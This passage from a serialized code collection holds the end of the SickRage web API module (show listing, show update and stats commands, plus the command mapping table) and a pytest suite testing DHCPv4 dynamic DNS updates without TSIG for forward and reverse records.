episode_status_counts_total:\n if statusCode == ""total"":\n episodes_stats[""total""] = episode_status_counts_total[statusCode]\n continue\n status, quality = Quality.splitCompositeStatus(int(statusCode))\n status_string = statusStrings[statusCode].lower().replace("" "", ""_"").replace(""("", """").replace(\n "")"", """")\n episodes_stats[status_string] = episode_status_counts_total[statusCode]\n\n return _responds(RESULT_SUCCESS, episodes_stats)\n\n\nclass CMD_ShowUpdate(ApiCall):\n _help = {\n ""desc"": ""Update a show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Update a show in SickRage """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n try:\n sickbeard.showQueueScheduler.action.updateShow(show_obj, True) # @UndefinedVariable\n return _responds(RESULT_SUCCESS, msg=str(show_obj.name) + "" has queued to be updated"")\n except CantUpdateShowException as e:\n logger.log(u""API::Unable to update show: {0}"".format(str(e)), logger.DEBUG)\n return _responds(RESULT_FAILURE, msg=""Unable to update "" + str(show_obj.name))\n\n\nclass CMD_Shows(ApiCall):\n _help = {\n ""desc"": ""Get all shows in SickRage"",\n ""optionalParameters"": {\n ""sort"": {""desc"": ""The sorting strategy to apply to the list of shows""},\n ""paused"": {""desc"": ""True to include paused shows, False otherwise""},\n },\n }\n\n def __init__(self, args, kwargs):\n # required\n # optional\n self.sort, args = self.check_params(args, kwargs, ""sort"", ""id"", False, ""string"", [""id"", ""name""])\n self.paused, args = self.check_params(args, kwargs, ""paused"", None, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get all shows in SickRage """"""\n shows = {}\n for curShow in sickbeard.showList:\n\n if 
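# --- illustrative sketch (not from the original module) ---
# The stats code above turns labels like "SD (TV)" into snake_case keys with
# a chain of .replace() calls; the same normalization as one named helper:
def status_key(label):
    return label.lower().replace(" ", "_").replace("(", "").replace(")", "")

assert status_key("SD (TV)") == "sd_tv"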
not self.paused and curShow.paused: # If we\'re not including paused shows, and the current show is paused\n continue # continue with the next show\n\n indexer_show = helpers.mapIndexersToShow(curShow)\n\n show_dict = {\n ""paused"": (0, 1)[curShow.paused],\n ""quality"": get_quality_string(curShow.quality),\n ""language"": curShow.lang,\n ""air_by_date"": (0, 1)[curShow.air_by_date],\n ""sports"": (0, 1)[curShow.sports],\n ""anime"": (0, 1)[curShow.anime],\n ""indexerid"": curShow.indexerid,\n ""tvdbid"": indexer_show[1],\n ""network"": curShow.network,\n ""show_name"": curShow.name,\n ""status"": curShow.status,\n ""subtitles"": (0, 1)[curShow.subtitles],\n }\n\n if helpers.tryInt(curShow.nextaired, 1) > 693595: # 1900\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(curShow.nextaired, curShow.airs, show_dict[\'network\']))\n show_dict[\'next_ep_airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n show_dict[\'next_ep_airdate\'] = \'\'\n\n show_dict[""cache""] = CMD_ShowCache((), {""indexerid"": curShow.indexerid}).run()[""data""]\n if not show_dict[""network""]:\n show_dict[""network""] = """"\n if self.sort == ""name"":\n shows[curShow.name] = show_dict\n else:\n shows[curShow.indexerid] = show_dict\n\n return _responds(RESULT_SUCCESS, shows)\n\n\nclass CMD_ShowsStats(ApiCall):\n _help = {""desc"": ""Get the global shows and episodes statistics""}\n\n def __init__(self, args, kwargs):\n # required\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the global shows and episodes statistics """"""\n stats = Show.overall_stats()\n\n return _responds(RESULT_SUCCESS, {\n \'ep_downloaded\': stats[\'episodes\'][\'downloaded\'],\n \'ep_snatched\': stats[\'episodes\'][\'snatched\'],\n \'ep_total\': stats[\'episodes\'][\'total\'],\n \'shows_active\': stats[\'shows\'][\'active\'],\n \'shows_total\': stats[\'shows\'][\'total\'],\n })\n\n\n# WARNING: never define a cmd call string that contains a ""_"" (underscore)\n# this is reserved for cmd indexes used while cmd chaining\n\n# WARNING: never define a param name that contains a ""."" (dot)\n# this is reserved for cmd namespaces used while cmd chaining\nfunction_mapper = {\n ""help"": CMD_Help,\n ""future"": CMD_ComingEpisodes,\n ""episode"": CMD_Episode,\n ""episode.search"": CMD_EpisodeSearch,\n ""episode.setstatus"": CMD_EpisodeSetStatus,\n ""episode.subtitlesearch"": CMD_SubtitleSearch,\n ""exceptions"": CMD_Exceptions,\n ""history"": CMD_History,\n ""history.clear"": CMD_HistoryClear,\n ""history.trim"": CMD_HistoryTrim,\n ""failed"": CMD_Failed,\n ""backlog"": CMD_Backlog,\n ""logs"": CMD_Logs,\n ""sb"": CMD_SickBeard,\n ""postprocess"": CMD_PostProcess,\n ""sb.addrootdir"": CMD_SickBeardAddRootDir,\n ""sb.checkversion"": CMD_SickBeardCheckVersion,\n ""sb.checkscheduler"": CMD_SickBeardCheckScheduler,\n ""sb.deleterootdir"": CMD_SickBeardDeleteRootDir,\n ""sb.getdefaults"": CMD_SickBeardGetDefaults,\n ""sb.getmessages"": CMD_SickBeardGetMessages,\n ""sb.getrootdirs"": CMD_SickBeardGetRootDirs,\n ""sb.pausebacklog"": CMD_SickBeardPauseBacklog,\n ""sb.ping"": CMD_SickBeardPing,\n ""sb.restart"": CMD_SickBeardRestart,\n ""sb.searchindexers"": CMD_SickBeardSearchIndexers,\n ""sb.searchtvdb"": CMD_SickBeardSearchTVDB,\n ""sb.searchtvrage"": CMD_SickBeardSearchTVRAGE,\n ""sb.setdefaults"": CMD_SickBeardSetDefaults,\n ""sb.update"": CMD_SickBeardUpdate,\n ""sb.shutdown"": CMD_SickBeardShutdown,\n ""show"": 
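# --- illustrative sketch (not from the original module) ---
# function_mapper is a plain dispatch table: the API layer looks the cmd
# string up and instantiates the matching class. The warnings apply because
# "_" in a cmd name is reserved for chain indexes and "." in a param name for
# namespaces. A minimal self-contained dispatcher in the same shape:
class CMD_Ping:
    def __init__(self, args, kwargs):
        pass

    def run(self):
        return {"result": "success", "msg": "Pong"}

function_mapper_sketch = {"sb.ping": CMD_Ping}

def dispatch(cmd, args=(), kwargs=None):
    handler = function_mapper_sketch.get(cmd)
    if handler is None:
        return {"result": "error", "msg": "Unknown command: " + cmd}
    return handler(args, kwargs or {}).run()

assert dispatch("sb.ping")["msg"] == "Pong"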
CMD_Show,\n ""show.addexisting"": CMD_ShowAddExisting,\n ""show.addnew"": CMD_ShowAddNew,\n ""show.cache"": CMD_ShowCache,\n ""show.delete"": CMD_ShowDelete,\n ""show.getquality"": CMD_ShowGetQuality,\n ""show.getposter"": CMD_ShowGetPoster,\n ""show.getbanner"": CMD_ShowGetBanner,\n ""show.getnetworklogo"": CMD_ShowGetNetworkLogo,\n ""show.getfanart"": CMD_ShowGetFanArt,\n ""show.pause"": CMD_ShowPause,\n ""show.refresh"": CMD_ShowRefresh,\n ""show.seasonlist"": CMD_ShowSeasonList,\n ""show.seasons"": CMD_ShowSeasons,\n ""show.setquality"": CMD_ShowSetQuality,\n ""show.stats"": CMD_ShowStats,\n ""show.update"": CMD_ShowUpdate,\n ""shows"": CMD_Shows,\n ""shows.stats"": CMD_ShowsStats\n}\n', '""""""DDNS without TSIG""""""\n\n# pylint: disable=invalid-name,line-too-long\n\nimport pytest\n\nimport misc\nimport srv_control\nimport srv_msg\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_add_success_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n 
srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_add_fail_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.exae.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.exae.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_notenabled_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', False)\n 
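# --- illustrative sketch (not part of the test suite) ---
# The PTR checks above query names under in-addr.arpa. (the literal addresses
# in this capture look anonymized to 127.0.0.1). For reference, a PTR owner
# name is the IPv4 octets reversed; the stdlib equivalent is
# ipaddress.ip_address(addr).reverse_pointer (without the trailing dot).
def to_ptr_name(ipv4):
    return ".".join(reversed(ipv4.split("."))) + ".in-addr.arpa."

assert to_ptr_name("192.168.50.10") == "10.50.168.192.in-addr.arpa."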
srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n # Response option 81 MUST contain flags 10. 
#later make it \'s\' \'n\' and \'o\' should be 10\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_update\ndef test_ddns4_notsig_forw_and_rev_update_success_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n 
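# --- reference note (not part of the test suite) ---
# The option 81 'flags' assertions in these tests decode per RFC 4702:
# bit 0 S (client asks the server to do the forward A update), bit 1 O
# (server overrode the client), bit 2 E (encoding), bit 3 N (server will do
# no updates). flags == 1 therefore means S was accepted, and the expected
# value of 10 in the disabled-updates case above is N|O (8 + 2).
FQDN_S, FQDN_O, FQDN_E, FQDN_N = 1, 2, 4, 8

assert FQDN_S == 1            # server performs the forward update
assert FQDN_N | FQDN_O == 10  # updates disabled: N and O both set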
srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_setup()\n srv_control.start_srv(\'DHCP\', \'stopped\')\n srv_control.clear_some_data(\'leases\')\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n misc.test_procedure()\n srv_msg.client_requests_option(1)\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'aa.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'aa.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'aa.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'127.0.0.1.in-addr.arpa.\', \'PTR\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'aa.four.example.com.\')\n 
srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'127.0.0.1.in-addr.arpa.\')\n\n\n@pytest.mark.v4\n@pytest.mark.ddns\n@pytest.mark.notsig\n@pytest.mark.forward_reverse_add\ndef test_ddns4_notsig_forw_and_rev_two_dhci_Sflag():\n\n misc.test_setup()\n srv_control.config_srv_subnet(\'192.168.50.0/24\', \'127.0.0.1-127.0.0.1\')\n srv_control.add_ddns_server(\'127.0.0.1\', \'53001\')\n srv_control.add_ddns_server_options(\'enable-updates\', True)\n srv_control.add_ddns_server_options(\'generated-prefix\', \'four\')\n srv_control.add_ddns_server_options(\'qualifying-suffix\', \'example.com\')\n srv_control.add_forward_ddns(\'four.example.com.\', \'EMPTY_KEY\')\n srv_control.add_reverse_ddns(\'50.168.192.in-addr.arpa.\', \'EMPTY_KEY\')\n srv_control.build_and_send_config_files()\n srv_control.start_srv(\'DHCP\', \'started\')\n\n srv_control.use_dns_set_number(20)\n srv_control.start_srv(\'DNS\', \'started\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client2.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\', expect_include=False)\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:11\')\n srv_msg.client_copy_option(\'server_id\')\n srv_msg.client_does_include_with_value(\'requested_addr\', \'127.0.0.1\')\n srv_msg.client_requests_option(1)\n srv_msg.client_sets_value(\'Client\', \'FQDN_domain_name\', \'client1.four.example.com.\')\n srv_msg.client_sets_value(\'Client\', \'FQDN_flags\', \'S\')\n srv_msg.client_does_include(\'Client\', \'fqdn\')\n srv_msg.client_send_msg(\'REQUEST\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'ACK\')\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n srv_msg.response_check_include_option(81)\n srv_msg.response_check_option_content(81, \'flags\', 1)\n srv_msg.response_check_option_content(81, \'fqdn\', \'client1.four.example.com.\')\n\n misc.test_procedure()\n srv_msg.dns_question_record(\'client1.four.example.com\', \'A\', \'IN\')\n srv_msg.client_send_dns_query()\n\n misc.pass_criteria()\n srv_msg.send_wait_for_query(\'MUST\')\n srv_msg.dns_option(\'ANSWER\')\n srv_msg.dns_option_content(\'ANSWER\', \'rdata\', \'127.0.0.1\')\n srv_msg.dns_option_content(\'ANSWER\', \'rrname\', \'client1.four.example.com.\')\n\n # Client 2 add\n misc.test_procedure()\n srv_msg.client_sets_value(\'Client\', \'chaddr\', \'00:00:00:00:00:12\')\n srv_msg.client_send_msg(\'DISCOVER\')\n\n misc.pass_criteria()\n srv_msg.send_wait_for_message(\'MUST\', \'OFFER\')\n srv_msg.response_check_include_option(1)\n srv_msg.response_check_content(\'yiaddr\', \'127.0.0.1\')\n srv_msg.response_check_option_content(1, \'value\', \'127.0.0.1\')\n\n 
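# --- editor\'s sketch (illustrative, not part of the original test) ---\n    # The reverse zone configured above, \'50.168.192.in-addr.arpa.\', is simply\n    # the subnet octets reversed; the stdlib can derive the per-address PTR\n    # owner name directly:\n    import ipaddress\n    assert ipaddress.ip_address(\'192.168.50.10\').reverse_pointer == \'10.50.168.192.in-addr.arpa\'\n    # --- end sketch ---\n    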
